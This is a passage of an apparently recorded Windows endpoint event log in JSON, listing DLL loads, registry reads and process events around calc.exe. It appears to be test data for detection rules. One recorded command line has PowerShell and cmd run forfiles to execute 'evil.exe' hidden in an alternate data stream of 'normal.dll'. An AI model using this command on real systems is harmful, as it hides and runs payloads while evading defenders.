"C:\\Windows\\System32\\iertutil.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021700000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ieframe.dll", - "image_path": "C:\\Windows\\System32\\ieframe.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021790016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021880000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "edputil.dll", - "image_path": "C:\\Windows\\System32\\edputil.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021880000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "mlang.dll", - "image_path": "C:\\Windows\\System32\\mlang.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "wininet.dll", - "image_path": "C:\\Windows\\System32\\wininet.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883574021970000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "Windows.UI.AppDefaults.dll", - "image_path": "C:\\Windows\\System32\\Windows.UI.AppDefaults.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts", - "registry_value": "ApplicationAssociationToasts", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022060000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "twinui.dll", - "image_path": "C:\\Windows\\System32\\twinui.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022150000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022150000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022150000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "twinui.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinui.appcore.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022180000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883574022330000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022330000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883574022330000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022330000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574022420000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022420000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredLaunchWindowingMode", - "registry_value": "PreferredLaunchWindowingMode", - "timestamp": 131883574022420000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883574022600000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022600000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_value": "WindowSizing", - "timestamp": 131883574022600000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574022600000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "image_load", - "image_name": "MrmCoreR.dll", - "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022780000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "BCP47mrm.dll", - "image_path": "C:\\Windows\\System32\\BCP47mrm.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022780000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "Windows.UI.dll", - "image_path": "C:\\Windows\\System32\\Windows.UI.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "image_load", - "image_name": "InputHost.dll", - "image_path": "C:\\Windows\\System32\\InputHost.dll", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\WINDOWS\\system32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574022860000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "process", - "pid": 2616, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "subtype": "terminate", - "timestamp": 131883574022950000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001055915701}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "process", - "pid": 4500, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "subtype": "terminate", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010F78D5701}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "registry", - "pid": 7276, - "process_name": "Calculator.exe", - "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", - "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", - "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState\\Mode", - "registry_value": "Mode", - "timestamp": 131883574023050000, - "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" - }, - { - "event_type": "process", - "pid": 5004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574023130000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010028D5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"forfiles /p c:\\windows\\system32 /m notepad.exe /c \" c:\\folder\\normal.dll:evil.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6296, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574023260000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023250000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023300000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023300000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023300000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574023300000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "command_line": "forfiles /p c:\\windows\\system32 /m notepad.exe /c c:\\folder\\normal.dll:evil.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 524, - "ppid": 6296, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "subtype": "create", - "timestamp": 131883574023440000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}", - "unique_ppid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "forfiles.exe", - "image_path": "C:\\Windows\\System32\\forfiles.exe", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023400000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023400000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023400000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023400000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - 